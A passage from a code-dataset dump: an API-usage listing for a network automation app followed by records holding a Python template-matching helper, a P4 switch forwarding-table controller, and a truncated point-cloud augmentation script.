"usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 1051, "usage_type": "name"}, {"api_name": "eNMS.environment.env.log", "line_number": 1052, "usage_type": "call"}, {"api_name": "eNMS.environment.env", "line_number": 1052, "usage_type": "name"}, {"api_name": "eNMS.environment.env.log", "line_number": 1056, "usage_type": "call"}, {"api_name": "eNMS.environment.env", "line_number": 1056, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 1056, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 1056, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 1058, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 1058, "usage_type": "name"}, {"api_name": "eNMS.environment.env.log", "line_number": 1059, "usage_type": "call"}, {"api_name": "eNMS.environment.env", "line_number": 1059, "usage_type": "name"}, {"api_name": "eNMS.environment.env.log", "line_number": 1062, "usage_type": "call"}, {"api_name": "eNMS.environment.env", "line_number": 1062, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 1062, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 1062, "usage_type": "name"}, {"api_name": "eNMS.database.db.session.commit", "line_number": 1063, "usage_type": "call"}, {"api_name": "eNMS.database.db.session", "line_number": 1063, "usage_type": "attribute"}, {"api_name": "eNMS.database.db", "line_number": 1063, "usage_type": "name"}, {"api_name": "eNMS.environment.env.log_events", "line_number": 1064, "usage_type": "attribute"}, {"api_name": "eNMS.environment.env", "line_number": 1064, "usage_type": "name"}, {"api_name": "eNMS.environment.env.log", "line_number": 1065, "usage_type": "call"}, {"api_name": "eNMS.environment.env", "line_number": 1065, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 1065, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 1065, "usage_type": "name"}, {"api_name": "eNMS.variables.vs.models", "line_number": 1069, "usage_type": "attribute"}, {"api_name": "eNMS.variables.vs", "line_number": 1069, "usage_type": "name"}, {"api_name": "eNMS.database.db.query", "line_number": 1070, "usage_type": "call"}, {"api_name": "eNMS.database.db", "line_number": 1070, "usage_type": "name"}, {"api_name": "sqlalchemy.and_", "line_number": 1072, "usage_type": "call"}, {"api_name": "eNMS.variables.vs.file_path", "line_number": 1090, "usage_type": "attribute"}, {"api_name": "eNMS.variables.vs", "line_number": 1090, "usage_type": "name"}, {"api_name": "eNMS.variables.vs.file_path", "line_number": 1091, "usage_type": "attribute"}, {"api_name": "eNMS.variables.vs", "line_number": 1091, "usage_type": "name"}, {"api_name": "tarfile.open", "line_number": 1093, "usage_type": "call"}, {"api_name": "eNMS.variables.vs.file_path", "line_number": 1094, "usage_type": "attribute"}, {"api_name": "eNMS.variables.vs", "line_number": 1094, "usage_type": "name"}, {"api_name": "shutil.rmtree", "line_number": 1104, "usage_type": "call"}, {"api_name": "eNMS.variables.vs.file_path", "line_number": 1104, "usage_type": "attribute"}, {"api_name": "eNMS.variables.vs", "line_number": 1104, "usage_type": "name"}, {"api_name": "eNMS.database.db.delete_all", "line_number": 1112, "usage_type": "call"}, {"api_name": "eNMS.database.db", "line_number": 1112, "usage_type": "name"}, {"api_name": "logging.info", "line_number": 1114, "usage_type": "call"}, {"api_name": "eNMS.variables.vs.relationships", "line_number": 1118, 
"usage_type": "attribute"}, {"api_name": "eNMS.variables.vs", "line_number": 1118, "usage_type": "name"}, {"api_name": "eNMS.database.db.fetch", "line_number": 1123, "usage_type": "call"}, {"api_name": "eNMS.database.db", "line_number": 1123, "usage_type": "name"}, {"api_name": "eNMS.database.db.fetch", "line_number": 1127, "usage_type": "call"}, {"api_name": "eNMS.database.db", "line_number": 1127, "usage_type": "name"}, {"api_name": "eNMS.database.db.fetch", "line_number": 1133, "usage_type": "call"}, {"api_name": "eNMS.database.db", "line_number": 1133, "usage_type": "name"}, {"api_name": "eNMS.database.db.fetch", "line_number": 1134, "usage_type": "call"}, {"api_name": "eNMS.database.db", "line_number": 1134, "usage_type": "name"}, {"api_name": "datetime.datetime.strptime", "line_number": 1144, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 1144, "usage_type": "name"}, {"api_name": "eNMS.database.db.session.query", "line_number": 1151, "usage_type": "call"}, {"api_name": "eNMS.database.db.session", "line_number": 1151, "usage_type": "attribute"}, {"api_name": "eNMS.database.db", "line_number": 1151, "usage_type": "name"}, {"api_name": "eNMS.variables.vs.models", "line_number": 1151, "usage_type": "attribute"}, {"api_name": "eNMS.variables.vs", "line_number": 1151, "usage_type": "name"}, {"api_name": "eNMS.variables.vs.models", "line_number": 1152, "usage_type": "attribute"}, {"api_name": "eNMS.variables.vs", "line_number": 1152, "usage_type": "name"}, {"api_name": "eNMS.database.db.session.commit", "line_number": 1155, "usage_type": "call"}, {"api_name": "eNMS.database.db.session", "line_number": 1155, "usage_type": "attribute"}, {"api_name": "eNMS.database.db", "line_number": 1155, "usage_type": "name"}, {"api_name": "threading.current_thread", "line_number": 1160, "usage_type": "call"}, {"api_name": "eNMS.variables.vs.model_properties", "line_number": 1163, "usage_type": "attribute"}, {"api_name": "eNMS.variables.vs", "line_number": 1163, "usage_type": "name"}, {"api_name": "eNMS.variables.vs.relationships", "line_number": 1163, "usage_type": "attribute"}, {"api_name": "eNMS.database.db.fetch", "line_number": 1168, "usage_type": "call"}, {"api_name": "eNMS.database.db", "line_number": 1168, "usage_type": "name"}, {"api_name": "eNMS.database.db.fetch", "line_number": 1175, "usage_type": "call"}, {"api_name": "eNMS.database.db", "line_number": 1175, "usage_type": "name"}, {"api_name": "eNMS.variables.vs.get_time", "line_number": 1187, "usage_type": "call"}, {"api_name": "eNMS.variables.vs", "line_number": 1187, "usage_type": "name"}, {"api_name": "eNMS.database.db.factory", "line_number": 1188, "usage_type": "call"}, {"api_name": "eNMS.database.db", "line_number": 1188, "usage_type": "name"}, {"api_name": "dramatiq.actor", "line_number": 1158, "usage_type": "call"}, {"api_name": "io.StringIO", "line_number": 1195, "usage_type": "call"}, {"api_name": "contextlib.redirect_stdout", "line_number": 1196, "usage_type": "call"}, {"api_name": "eNMS.environment.env", "line_number": 1202, "usage_type": "name"}, {"api_name": "eNMS.database.db", "line_number": 1203, "usage_type": "name"}, {"api_name": "eNMS.variables.vs.models", "line_number": 1204, "usage_type": "attribute"}, {"api_name": "eNMS.variables.vs", "line_number": 1204, "usage_type": "name"}, {"api_name": "eNMS.variables.vs", "line_number": 1205, "usage_type": "name"}, {"api_name": "traceback.format_exc", "line_number": 1209, "usage_type": "call"}, {"api_name": "eNMS.variables.vs.server_data", "line_number": 
1213, "usage_type": "attribute"}, {"api_name": "eNMS.variables.vs", "line_number": 1213, "usage_type": "name"}, {"api_name": "flask_login.current_user", "line_number": 1222, "usage_type": "argument"}, {"api_name": "eNMS.database.db.fetch", "line_number": 1223, "usage_type": "call"}, {"api_name": "eNMS.database.db", "line_number": 1223, "usage_type": "name"}, {"api_name": "eNMS.variables.vs.get_time", "line_number": 1227, "usage_type": "call"}, {"api_name": "eNMS.variables.vs", "line_number": 1227, "usage_type": "name"}, {"api_name": "eNMS.database.db.fetch", "line_number": 1229, "usage_type": "call"}, {"api_name": "eNMS.database.db", "line_number": 1229, "usage_type": "name"}, {"api_name": "eNMS.variables.vs.settings", "line_number": 1232, "usage_type": "attribute"}, {"api_name": "eNMS.variables.vs", "line_number": 1232, "usage_type": "name"}, {"api_name": "threading.Thread", "line_number": 1235, "usage_type": "call"}, {"api_name": "flask_login.current_user.name", "line_number": 1242, "usage_type": "attribute"}, {"api_name": "flask_login.current_user", "line_number": 1242, "usage_type": "name"}, {"api_name": "eNMS.variables.vs.file_path", "line_number": 1254, "usage_type": "attribute"}, {"api_name": "eNMS.variables.vs", "line_number": 1254, "usage_type": "name"}, {"api_name": "eNMS.database.db.fetch", "line_number": 1256, "usage_type": "call"}, {"api_name": "eNMS.database.db", "line_number": 1256, "usage_type": "name"}, {"api_name": "eNMS.variables.vs.get_time", "line_number": 1260, "usage_type": "call"}, {"api_name": "eNMS.variables.vs", "line_number": 1260, "usage_type": "name"}, {"api_name": "eNMS.database.db.fetch", "line_number": 1261, "usage_type": "call"}, {"api_name": "eNMS.database.db", "line_number": 1261, "usage_type": "name"}, {"api_name": "eNMS.database.db.fetch", "line_number": 1268, "usage_type": "call"}, {"api_name": "eNMS.database.db", "line_number": 1268, "usage_type": "name"}, {"api_name": "eNMS.variables.vs.settings", "line_number": 1275, "usage_type": "attribute"}, {"api_name": "eNMS.variables.vs", "line_number": 1275, "usage_type": "name"}, {"api_name": "flask_login.current_user.authentication", "line_number": 1276, "usage_type": "attribute"}, {"api_name": "flask_login.current_user", "line_number": 1276, "usage_type": "name"}, {"api_name": "flask_login.current_user.update", "line_number": 1278, "usage_type": "call"}, {"api_name": "flask_login.current_user", "line_number": 1278, "usage_type": "name"}, {"api_name": "eNMS.variables.vs.settings", "line_number": 1281, "usage_type": "attribute"}, {"api_name": "eNMS.variables.vs", "line_number": 1281, "usage_type": "name"}, {"api_name": "eNMS.variables.vs.template_context", "line_number": 1281, "usage_type": "attribute"}, {"api_name": "eNMS.variables.vs.path", "line_number": 1283, "usage_type": "attribute"}, {"api_name": "eNMS.variables.vs", "line_number": 1283, "usage_type": "name"}, {"api_name": "json.dump", "line_number": 1284, "usage_type": "call"}, {"api_name": "eNMS.variables.vs.settings", "line_number": 1287, "usage_type": "attribute"}, {"api_name": "eNMS.variables.vs", "line_number": 1287, "usage_type": "name"}, {"api_name": "ipaddress.IPv4Network", "line_number": 1288, "usage_type": "call"}, {"api_name": "eNMS.variables.vs.settings", "line_number": 1288, "usage_type": "attribute"}, {"api_name": "eNMS.variables.vs", "line_number": 1288, "usage_type": "name"}, {"api_name": "requests.get", "line_number": 1290, "usage_type": "call"}, {"api_name": "eNMS.variables.vs.settings", "line_number": 1292, "usage_type": 
"attribute"}, {"api_name": "eNMS.variables.vs", "line_number": 1292, "usage_type": "name"}, {"api_name": "eNMS.variables.vs.settings", "line_number": 1294, "usage_type": "attribute"}, {"api_name": "eNMS.variables.vs", "line_number": 1294, "usage_type": "name"}, {"api_name": "eNMS.database.db.factory", "line_number": 1296, "usage_type": "call"}, {"api_name": "eNMS.database.db", "line_number": 1296, "usage_type": "name"}, {"api_name": "eNMS.variables.vs.playbook_path", "line_number": 1303, "usage_type": "attribute"}, {"api_name": "eNMS.variables.vs", "line_number": 1303, "usage_type": "name"}, {"api_name": "pathlib.Path", "line_number": 1304, "usage_type": "call"}, {"api_name": "eNMS.variables.vs.playbook_path", "line_number": 1304, "usage_type": "attribute"}, {"api_name": "eNMS.variables.vs", "line_number": 1304, "usage_type": "name"}, {"api_name": "eNMS.database.db.fetch", "line_number": 1318, "usage_type": "call"}, {"api_name": "eNMS.database.db", "line_number": 1318, "usage_type": "name"}, {"api_name": "sqlalchemy.orm.aliased", "line_number": 1323, "usage_type": "call"}, {"api_name": "eNMS.variables.vs.models", "line_number": 1323, "usage_type": "attribute"}, {"api_name": "eNMS.variables.vs", "line_number": 1323, "usage_type": "name"}, {"api_name": "eNMS.database.db.query", "line_number": 1326, "usage_type": "call"}, {"api_name": "eNMS.database.db", "line_number": 1326, "usage_type": "name"}, {"api_name": "eNMS.variables.vs.models", "line_number": 1327, "usage_type": "attribute"}, {"api_name": "eNMS.variables.vs", "line_number": 1327, "usage_type": "name"}, {"api_name": "eNMS.database.db.fetch", "line_number": 1335, "usage_type": "call"}, {"api_name": "eNMS.database.db", "line_number": 1335, "usage_type": "name"}, {"api_name": "eNMS.database.db.fetch", "line_number": 1336, "usage_type": "call"}, {"api_name": "eNMS.database.db", "line_number": 1336, "usage_type": "name"}, {"api_name": "eNMS.database.db.fetch", "line_number": 1348, "usage_type": "call"}, {"api_name": "eNMS.database.db", "line_number": 1348, "usage_type": "name"}, {"api_name": "eNMS.environment.env.redis_queue", "line_number": 1350, "usage_type": "attribute"}, {"api_name": "eNMS.environment.env", "line_number": 1350, "usage_type": "name"}, {"api_name": "eNMS.environment.env.redis", "line_number": 1351, "usage_type": "call"}, {"api_name": "eNMS.environment.env", "line_number": 1351, "usage_type": "name"}, {"api_name": "eNMS.variables.vs.run_stop", "line_number": 1353, "usage_type": "attribute"}, {"api_name": "eNMS.variables.vs", "line_number": 1353, "usage_type": "name"}, {"api_name": "eNMS.database.db.fetch", "line_number": 1357, "usage_type": "call"}, {"api_name": "eNMS.database.db", "line_number": 1357, "usage_type": "name"}, {"api_name": "eNMS.database.db.fetch", "line_number": 1361, "usage_type": "call"}, {"api_name": "eNMS.database.db", "line_number": 1361, "usage_type": "name"}, {"api_name": "eNMS.database.db.fetch", "line_number": 1364, "usage_type": "call"}, {"api_name": "eNMS.database.db", "line_number": 1364, "usage_type": "name"}, {"api_name": "xlwt.Workbook", "line_number": 1367, "usage_type": "call"}, {"api_name": "eNMS.variables.vs.model_properties", "line_number": 1373, "usage_type": "attribute"}, {"api_name": "eNMS.variables.vs", "line_number": 1373, "usage_type": "name"}, {"api_name": "eNMS.database.db.dont_migrate", "line_number": 1374, "usage_type": "attribute"}, {"api_name": "eNMS.database.db", "line_number": 1374, "usage_type": "name"}, {"api_name": "eNMS.database.db.fetch_all", "line_number": 1377, 
"usage_type": "call"}, {"api_name": "eNMS.database.db", "line_number": 1377, "usage_type": "name"}, {"api_name": "eNMS.environment.env.decrypt", "line_number": 1380, "usage_type": "call"}, {"api_name": "eNMS.environment.env", "line_number": 1380, "usage_type": "name"}, {"api_name": "eNMS.variables.vs.file_path", "line_number": 1382, "usage_type": "attribute"}, {"api_name": "eNMS.variables.vs", "line_number": 1382, "usage_type": "name"}, {"api_name": "xlrd.open_workbook", "line_number": 1385, "usage_type": "call"}, {"api_name": "xlrd.biffh.XLRDError", "line_number": 1390, "usage_type": "name"}, {"api_name": "eNMS.variables.vs.model_properties", "line_number": 1398, "usage_type": "attribute"}, {"api_name": "eNMS.variables.vs", "line_number": 1398, "usage_type": "name"}, {"api_name": "eNMS.database.db.field_conversion", "line_number": 1399, "usage_type": "attribute"}, {"api_name": "eNMS.database.db", "line_number": 1399, "usage_type": "name"}, {"api_name": "eNMS.database.db.factory", "line_number": 1402, "usage_type": "call"}, {"api_name": "eNMS.database.db", "line_number": 1402, "usage_type": "name"}, {"api_name": "logging.info", "line_number": 1404, "usage_type": "call"}, {"api_name": "eNMS.database.db.session.commit", "line_number": 1406, "usage_type": "call"}, {"api_name": "eNMS.database.db.session", "line_number": 1406, "usage_type": "attribute"}, {"api_name": "eNMS.database.db", "line_number": 1406, "usage_type": "name"}, {"api_name": "eNMS.database.db.fetch_all", "line_number": 1407, "usage_type": "call"}, {"api_name": "eNMS.database.db", "line_number": 1407, "usage_type": "name"}, {"api_name": "eNMS.environment.env.log", "line_number": 1409, "usage_type": "call"}, {"api_name": "eNMS.environment.env", "line_number": 1409, "usage_type": "name"}, {"api_name": "flask_login.current_user", "line_number": 1419, "usage_type": "argument"}, {"api_name": "eNMS.database.db.fetch", "line_number": 1424, "usage_type": "call"}, {"api_name": "eNMS.database.db", "line_number": 1424, "usage_type": "name"}, {"api_name": "eNMS.database.db.factory", "line_number": 1425, "usage_type": "call"}, {"api_name": "eNMS.database.db", "line_number": 1425, "usage_type": "name"}, {"api_name": "eNMS.database.db.fetch", "line_number": 1427, "usage_type": "call"}, {"api_name": "eNMS.database.db", "line_number": 1427, "usage_type": "name"}, {"api_name": "eNMS.database.db.session.flush", "line_number": 1428, "usage_type": "call"}, {"api_name": "eNMS.database.db.session", "line_number": 1428, "usage_type": "attribute"}, {"api_name": "eNMS.database.db", "line_number": 1428, "usage_type": "name"}, {"api_name": "eNMS.database.db.rbac_error", "line_number": 1430, "usage_type": "attribute"}, {"api_name": "eNMS.database.db", "line_number": 1430, "usage_type": "name"}, {"api_name": "eNMS.database.db.session.rollback", "line_number": 1433, "usage_type": "call"}, {"api_name": "eNMS.database.db.session", "line_number": 1433, "usage_type": "attribute"}, {"api_name": "eNMS.database.db", "line_number": 1433, "usage_type": "name"}, {"api_name": "sqlalchemy.exc.IntegrityError", "line_number": 1434, "usage_type": "argument"}, {"api_name": "eNMS.environment.env.log", "line_number": 1440, "usage_type": "call"}, {"api_name": "eNMS.environment.env", "line_number": 1440, "usage_type": "name"}, {"api_name": "traceback.format_exc", "line_number": 1440, "usage_type": "call"}, {"api_name": "eNMS.database.db.fetch_all", "line_number": 1444, "usage_type": "call"}, {"api_name": "eNMS.database.db", "line_number": 1444, "usage_type": "name"}, 
{"api_name": "eNMS.variables.vs.path", "line_number": 1448, "usage_type": "attribute"}, {"api_name": "eNMS.variables.vs", "line_number": 1448, "usage_type": "name"}, {"api_name": "eNMS.environment.env.log", "line_number": 1449, "usage_type": "call"}, {"api_name": "eNMS.environment.env", "line_number": 1449, "usage_type": "name"}, {"api_name": "os.scandir", "line_number": 1450, "usage_type": "call"}, {"api_name": "eNMS.database.db.fetch", "line_number": 1451, "usage_type": "call"}, {"api_name": "eNMS.database.db", "line_number": 1451, "usage_type": "name"}, {"api_name": "pathlib.Path", "line_number": 1452, "usage_type": "call"}, {"api_name": "json.load", "line_number": 1457, "usage_type": "call"}, {"api_name": "eNMS.variables.vs.configuration_properties", "line_number": 1460, "usage_type": "attribute"}, {"api_name": "eNMS.variables.vs", "line_number": 1460, "usage_type": "name"}, {"api_name": "eNMS.variables.vs.str_to_date", "line_number": 1466, "usage_type": "call"}, {"api_name": "eNMS.variables.vs", "line_number": 1466, "usage_type": "name"}, {"api_name": "pathlib.Path", "line_number": 1468, "usage_type": "call"}, {"api_name": "eNMS.database.db.session.commit", "line_number": 1473, "usage_type": "call"}, {"api_name": "eNMS.database.db.session", "line_number": 1473, "usage_type": "attribute"}, {"api_name": "eNMS.database.db", "line_number": 1473, "usage_type": "name"}, {"api_name": "eNMS.database.db.fetch_all", "line_number": 1474, "usage_type": "call"}, {"api_name": "eNMS.database.db", "line_number": 1474, "usage_type": "name"}, {"api_name": "eNMS.variables.vs.configuration_properties", "line_number": 1477, "usage_type": "attribute"}, {"api_name": "eNMS.variables.vs", "line_number": 1477, "usage_type": "name"}, {"api_name": "eNMS.database.db.session.commit", "line_number": 1480, "usage_type": "call"}, {"api_name": "eNMS.database.db.session", "line_number": 1480, "usage_type": "attribute"}, {"api_name": "eNMS.database.db", "line_number": 1480, "usage_type": "name"}, {"api_name": "eNMS.database.db.fetch_all", "line_number": 1483, "usage_type": "call"}, {"api_name": "eNMS.database.db", "line_number": 1483, "usage_type": "name"}, {"api_name": "eNMS.variables.vs.rbac", "line_number": 1484, "usage_type": "attribute"}, {"api_name": "eNMS.variables.vs", "line_number": 1484, "usage_type": "name"}, {"api_name": "eNMS.variables.vs.models", "line_number": 1485, "usage_type": "attribute"}, {"api_name": "eNMS.variables.vs", "line_number": 1485, "usage_type": "name"}, {"api_name": "eNMS.database.db.query", "line_number": 1487, "usage_type": "call"}, {"api_name": "eNMS.database.db", "line_number": 1487, "usage_type": "name"}, {"api_name": "eNMS.variables.vs.models", "line_number": 1488, "usage_type": "attribute"}, {"api_name": "eNMS.variables.vs", "line_number": 1488, "usage_type": "name"}, {"api_name": "eNMS.variables.vs.models", "line_number": 1489, "usage_type": "attribute"}, {"api_name": "eNMS.variables.vs", "line_number": 1489, "usage_type": "name"}, {"api_name": "eNMS.variables.vs.models", "line_number": 1490, "usage_type": "attribute"}, {"api_name": "eNMS.variables.vs", "line_number": 1490, "usage_type": "name"}, {"api_name": "eNMS.variables.vs.file_path", "line_number": 1496, "usage_type": "attribute"}, {"api_name": "eNMS.variables.vs", "line_number": 1496, "usage_type": "name"}, {"api_name": "eNMS.database.db.fetch", "line_number": 1500, "usage_type": "call"}, {"api_name": "eNMS.database.db", "line_number": 1500, "usage_type": "name"}, {"api_name": "eNMS.variables.vs.settings", "line_number": 
1509, "usage_type": "attribute"}, {"api_name": "eNMS.variables.vs", "line_number": 1509, "usage_type": "name"}, {"api_name": "eNMS.database.db.fetch", "line_number": 1511, "usage_type": "call"}, {"api_name": "eNMS.database.db", "line_number": 1511, "usage_type": "name"}, {"api_name": "eNMS.environment.env.get_ssh_port", "line_number": 1512, "usage_type": "call"}, {"api_name": "eNMS.environment.env", "line_number": 1512, "usage_type": "name"}, {"api_name": "uuid.uuid4", "line_number": 1512, "usage_type": "call"}, {"api_name": "eNMS.variables.vs.settings", "line_number": 1513, "usage_type": "attribute"}, {"api_name": "eNMS.variables.vs", "line_number": 1513, "usage_type": "name"}, {"api_name": "eNMS.variables.vs.settings", "line_number": 1514, "usage_type": "attribute"}, {"api_name": "eNMS.variables.vs", "line_number": 1514, "usage_type": "name"}, {"api_name": "eNMS.variables.vs.settings", "line_number": 1519, "usage_type": "attribute"}, {"api_name": "eNMS.variables.vs", "line_number": 1519, "usage_type": "name"}, {"api_name": "os.getenv", "line_number": 1520, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 1523, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 1524, "usage_type": "call"}, {"api_name": "eNMS.variables.vs.settings", "line_number": 1530, "usage_type": "attribute"}, {"api_name": "eNMS.variables.vs", "line_number": 1530, "usage_type": "name"}, {"api_name": "flask_login.current_user.name", "line_number": 1531, "usage_type": "attribute"}, {"api_name": "flask_login.current_user", "line_number": 1531, "usage_type": "name"}, {"api_name": "subprocess.Popen", "line_number": 1538, "usage_type": "call"}, {"api_name": "eNMS.variables.vs.path", "line_number": 1538, "usage_type": "attribute"}, {"api_name": "eNMS.variables.vs", "line_number": 1538, "usage_type": "name"}, {"api_name": "eNMS.variables.vs.settings", "line_number": 1543, "usage_type": "attribute"}, {"api_name": "eNMS.variables.vs", "line_number": 1543, "usage_type": "name"}]} +{"seq_id": "72551880165", "text": "import numpy as np\nimport cv2\n\n\n# def colourClear(img):\n# img[np.where(np.sum(img, axis=2) < 120)] = [0, 0, 0]\n# img[np.where((np.max(img, axis=2) - np.min(img, axis=2) < 25) & (np.sum(img, axis=2) < 300))] = [0, 0, 0]\n# return img\n\n\ndef colourCheck(colour, blue=False, green=False, red=False):\n b = colour[:, 0]\n g = colour[:, 1]\n r = colour[:, 2]\n right_bool = False\n if blue:\n right_bool = (((b > r) * (b > g) * (b > 150)) > 0).any()\n if green:\n right_bool = (((g > b) * (g > r) * (g > 100)) > 0).any()\n if red:\n right_bool = (((r > b) * (r > g) * (r > 150)) > 0).any()\n\n return right_bool\n\n\ndef findPositions(oriImg, targetImg, mask=None, threshold=0.8, test='', colour=[255, 0, 0], maxThreshold=1.1):\n h, w = targetImg.shape[:2] # rows->h, cols->w\n h2, w2 = oriImg.shape[:2] # rows->h, cols->w\n img_gray = cv2.cvtColor(oriImg.copy(), cv2.COLOR_BGR2GRAY)\n targetImg_gray = cv2.cvtColor(targetImg.copy(), cv2.COLOR_BGR2GRAY)\n res = cv2.matchTemplate(img_gray, targetImg_gray, cv2.TM_CCORR_NORMED)\n img = oriImg.copy()\n # img = oriImg\n positions = []\n\n max_val = 1\n while (max_val > threshold):\n min_val, max_val, min_loc, max_loc = cv2.minMaxLoc(res)\n start_row = np.max([0, max_loc[1] - h // 2])\n end_row = np.min([h2, max_loc[1] + h // 2])\n start_col = np.max([0, max_loc[0] - w // 2])\n end_col = np.min([w2, max_loc[0] + w // 2])\n if max_val > threshold:\n # Prevent start_row, end_row, start_col, end_col be out of range of image\n positions.append(max_loc)\n if test 
!= '':\n img = cv2.rectangle(img, (max_loc[0], max_loc[1]), (max_loc[0] + w + 1, max_loc[1] + h + 1),\n colour)\n else:\n break\n res[start_row: end_row, start_col: end_col] = 0\n if test != '':\n cv2.imwrite('result{}.png'.format(test), img)\n\n return np.array(positions)\n", "repo_name": "YHD97/FinalProject", "sub_path": "gymLoL/gym_LoL/envs/colourHelper.py", "file_name": "colourHelper.py", "file_ext": "py", "file_size_in_byte": 1989, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "cv2.cvtColor", "line_number": 29, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2GRAY", "line_number": 29, "usage_type": "attribute"}, {"api_name": "cv2.cvtColor", "line_number": 30, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2GRAY", "line_number": 30, "usage_type": "attribute"}, {"api_name": "cv2.matchTemplate", "line_number": 31, "usage_type": "call"}, {"api_name": "cv2.TM_CCORR_NORMED", "line_number": 31, "usage_type": "attribute"}, {"api_name": "cv2.minMaxLoc", "line_number": 38, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 39, "usage_type": "call"}, {"api_name": "numpy.min", "line_number": 40, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 41, "usage_type": "call"}, {"api_name": "numpy.min", "line_number": 42, "usage_type": "call"}, {"api_name": "cv2.rectangle", "line_number": 47, "usage_type": "call"}, {"api_name": "cv2.imwrite", "line_number": 53, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 55, "usage_type": "call"}]} +{"seq_id": "31277648104", "text": "import logging\n\nfrom control import Control\n\n\nclass Forwarder(Control):\n\n def __init__(self, target, gc, bfrt_info, mgid):\n # Set up base class\n super(Forwarder, self).__init__(target, gc)\n\n self.log = logging.getLogger(__name__)\n\n self.tables = [bfrt_info.table_get('pipe.Ingress.forwarder.forward')]\n self.table = self.tables[0]\n\n # Annotations\n self.table.info.key_field_annotation_add('hdr.ethernet.dst_addr', 'mac')\n\n # Multicast group ID for flood\n self.mgid = mgid\n\n # Keep set of mac addresses so we can delete them all without deleting the flood rule\n self.mac_addresses = {}\n\n # Clear table and add defaults\n self._clear()\n self.add_default_entries()\n\n def _clear(self):\n ''' Remove all entries (except broadcast) '''\n\n self.table.entry_del(self.target, [\n self.table.make_key(\n [self.gc.KeyTuple('hdr.ethernet.dst_addr', mac_address)])\n for mac_address in self.mac_addresses\n ])\n self.mac_addresses.clear()\n\n def add_default_entries(self):\n ''' Add broadcast and default entries '''\n\n # Add broadcast entry\n self.table.entry_add(self.target, [\n self.table.make_key([\n self.gc.KeyTuple('hdr.ethernet.dst_addr', 'ff:ff:ff:ff:ff:ff')\n ])\n ], [\n self.table.make_data([self.gc.DataTuple('flood_mgid', self.mgid)],\n 'Ingress.forwarder.flood')\n ])\n\n # Add default entry\n self.table.default_entry_set(\n self.target,\n self.table.make_data([self.gc.DataTuple('flood_mgid', self.mgid)],\n 'Ingress.forwarder.flood'))\n\n def add_entry(self, dev_port, mac_address):\n ''' Add one entry.\n\n Keyword arguments:\n dev_port -- dev port number\n mac_address -- MAC address reachable through the port\n '''\n\n self.table.entry_add(self.target, [\n self.table.make_key(\n [self.gc.KeyTuple('hdr.ethernet.dst_addr', mac_address)])\n ], [\n self.table.make_data([self.gc.DataTuple('egress_port', dev_port)],\n 'Ingress.forwarder.set_egress_port')\n ])\n self.mac_addresses[mac_address] = 
dev_port\n\n def add_entries(self, entry_list):\n ''' Add entries.\n\n Keyword arguments:\n entry_list -- a list of tuples: (dev_port, mac_address)\n '''\n\n for (dev_port, mac_address) in entry_list:\n self.add_entry(dev_port, mac_address)\n\n def remove_entry(self, mac_address):\n ''' Remove one entry '''\n self.table.entry_del(self.target, [\n self.table.make_key(\n [self.gc.KeyTuple('hdr.ethernet.dst_addr', mac_address)])\n ])\n del self.mac_addresses[mac_address]\n\n def get_dev_port(self, mac):\n ''' Get dev port for MAC address.\n\n Returns:\n (success flag, dev port or error message)\n '''\n\n mac = mac.upper()\n if mac not in self.mac_addresses:\n return (False, 'MAC address not found')\n return (True, self.mac_addresses[mac])\n\n def get_macs_on_port(self, dev_port):\n ''' Get MAC addresses associated to a dev port '''\n\n results = []\n for mac_address, port in self.mac_addresses.items():\n if port == dev_port:\n results.append(mac_address)\n\n return results\n\n def get_entries(self):\n ''' Get all forwarding entries.\n\n Returns:\n list of (MAC address, dev port)\n '''\n\n return self.mac_addresses.items()\n", "repo_name": "p4lang/p4app-switchML", "sub_path": "dev_root/controller/forwarder.py", "file_name": "forwarder.py", "file_ext": "py", "file_size_in_byte": 3760, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 137, "dataset": "github-code", "pt": "52", "api": [{"api_name": "control.Control", "line_number": 6, "usage_type": "name"}, {"api_name": "logging.getLogger", "line_number": 12, "usage_type": "call"}]} +{"seq_id": "36150693311", "text": "#-*-coding:utf-8-*-\n#augment the parts with little data by adding perturbation\nimport h5py\nimport numpy as np\nimport os \nimport sys\nBASE_DIR=os.path.dirname(os.path.abspath(__file__))\nsys.path.append(BASE_DIR)\nsys.path.append(os.path.dirname(BASE_DIR))\nimport provider\n\nhdf5_data_dir=os.path.join(BASE_DIR,'./hdf5_data')\ntrain_file_list=provider.getDataFiles(os.path.join(hdf5_data_dir,'train_hdf5_file_list.txt'))\nnum_train_file=len(train_file_list)\n#render the point cloud to an .obj file\ndef output_point_cloud(data,out_file):\n with open(out_file,'w') as f:\n for i in range(data.shape[0]):\n f.write('v %f %f %f\\r\\n'%(data[i][0],data[i][1],data[i][2]))\ndef find_all_needto_aug_part():\n '''\n Extract the data that meets the conditions from the source files\n '''\n #initialize a placeholder with the same format as the data\n object_data=np.zeros((1,2048,3))\n object_labels=np.zeros((1),np.int32)\n object_seg=np.zeros((1,2048),np.int32)\n #extract all data that matches the target labels\n sigma=0.001\n clip=0.005\n for i in range(num_train_file):\n print('load the num '+str(i)+' train file')\n cur_train_filename = os.path.join(hdf5_data_dir, train_file_list[i])\n cur_data, cur_labels, cur_seg = provider.loadDataFile_with_seg(cur_train_filename)\n for nlabel in range(cur_data.shape[0]):\n jittered_data = np.clip(sigma * np.random.randn(cur_data.shape[0],cur_data.shape[1],cur_data.shape[2]),-clip,clip)\n for npoint in range(cur_data.shape[1]):\n #zero the jitter for points whose part label is not in the target set\n if cur_seg[nlabel][npoint]!=4 and cur_seg[nlabel][npoint]!=8 and 